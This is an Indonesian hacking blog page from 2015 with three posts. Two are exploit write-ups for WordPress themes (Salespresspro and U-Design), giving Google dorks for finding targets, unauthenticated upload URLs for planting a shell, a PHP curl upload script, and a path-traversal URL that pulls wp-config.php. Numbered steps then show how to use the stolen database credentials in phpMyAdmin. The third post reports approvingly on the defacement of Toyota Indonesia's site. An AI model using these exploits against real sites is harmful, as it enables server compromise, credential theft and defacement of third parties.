Sabtu, 26 September 2015

Wordpress Salespresspro Theme File Upload Vulnerability

#-Title: Wordpress Salespresspro Theme File Upload Vulnerability
#-Author: unknown
#-Date: 18/01/2015
#- Vendor : Mark Dulisse
#- Link Download : sites.google.com/site/getsalespresspro20get/
#-Google Dork: inurl:wp-content/themes/Salespresspro
#- Tested on : Windows 7
#- Fixed in v2.0
==========================================================================

Proof Of Concept :

http://site.com/wp-content/themes/salespresspro/headerimgbgblog-upload.php  

Upload Shell > Buka di tab baru / lewat inspect elemen

Patch :

 baru / Simply cuman rename headerimgbgblog-upload.php jadi headerimgbgblog-upload.txt
Diposting oleh di Tidak ada komentar:
Label: ,

Rabu, 23 September 2015

Wordpress Themes U-Design Multiple Vulnerabilty




#-Title: Wordpress Themes U-Design Multiple Vulnerabilty
#-Author: Tn_Scorpion
#-Date: 18/01/2015
#- Vendor : Themeforest
#- by : andondesign
#- Link Download : themeforest.net/item/udesign-responsive-wordpress-theme/253220
#-Google Dork: inurl:wp-content/themes/u-design
#- Tested on : Windows 8
--------------------------------------------------------
Multiple Vulnerabilty

Kenapa ? karena themes ini mempunyai dua bug sebenernya, tapi yang tenar cuma File uplod vulnerabilitynya doang :'v sebenernya ada ada lagi yaitu Arbitrary File Download Vulnerability. ok cukup ~

Proof Of Concept :

--
File uplod vulnerability 
--

<?php

$uploadfile="3xploi7.php";

$ch = curl_init("http://3xploi7.id/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php");

curl_setopt($ch, CURLOPT_POST, true);

curl_setopt($ch, CURLOPT_POSTFIELDS,

              array('Filedata'=>"@$uploadfile",

              'folder'=>'/wp-content/themes/u-design/scripts/admin/uploadify/'));

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$postResult = curl_exec($ch);

curl_close($ch);



  print "$postResult";

?>

Result : Here !
--
File Download Vulnerability
--

http://3xploi7.id/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

1. Download Confignya
2. Buka dan cari user pw dbnya
3. login di web.com/phpmyadmin
4. terserah anda.

Diposting oleh di Tidak ada komentar:
Label: , ,

Selasa, 22 September 2015

Situs Toyota Kembali Di Hack !




Sebuah Kelompok hacker kembali menyerang situs Indonesia, dan kali ini korbannya adalah situs resmi Toyota Indonesia.

Ketika kami mencoba membuka situs Toyota Indonesia yang beralamat do www.toyota.astra.co.id, laman yang biasanya menampilkan index yang berisi daftar produk-produk terbaru Toyota tersebut berubah dan hanya terlihat background 'hijau'akibat aksi 'defacing'. Di bagian bawah tampilan, terdapat tulisan bila situs tersebut dihack oleh seseorang yang bernick UnknownYmouz.

Dilihat Secara keseluruhan, yang bisa dilihat netizen hanya beberapa tulisan saja, seperti 'Indonesian Code Party'. Di laman itu sepertinya juga ada sebuah gambar dan video yang ingin ditampilkan oleh si hacker, tetapi tidak muncul.

Setelah ditelusuri oleh tim kami, aksi deface yang mengarah ke situs Toyota itu hanya terjadi dibagian 'Homepage' website saja. Sementara, bagian situs lain seperti 'News&Promo' bisa diakses seperti normal.

Namun, beberapa tautan di dalam situs Toyota Indonesia itu berhasil ganti. Misalnya, saat artikel "tips" di situs dibuka, maka akan terlihat jendela kosong dengan bertulisan 'f*ck' di bagian atas.

Sampai saat ini, belum ada pernyataan resmi dari pihak Toyota Indonesia akan kasus peretasan UnknownYmouz. Situs Toyota Indonesia pun masih belum bisa diakses dengan normal sanoau saat ini (22/09/2015 19:19:59) . Namun, situs toyota.com tidak terkena masalah defacing ini. mungkin toyota.com di chmood supaya tidak bisa dirubah. situs toyota sebelumnya juga pernah di deface oleh GantengersCrew & ./MrJ

* Setelah ditelusuri oleh kami, website tersebut mempunyai bug fpumd uploader yang bisa digunakan untuk mengupload sesuatu tetapi tidak secure oleh pihak admin, jadi bisa ke upload shell atau backdoor

Berikut daftar situs yang di deface :


Aksi tersebut disimpan dengan mirror zone=h sebagai berikut :




Diposting oleh di Tidak ada komentar:
Label:
Langganan: Postingan (Atom)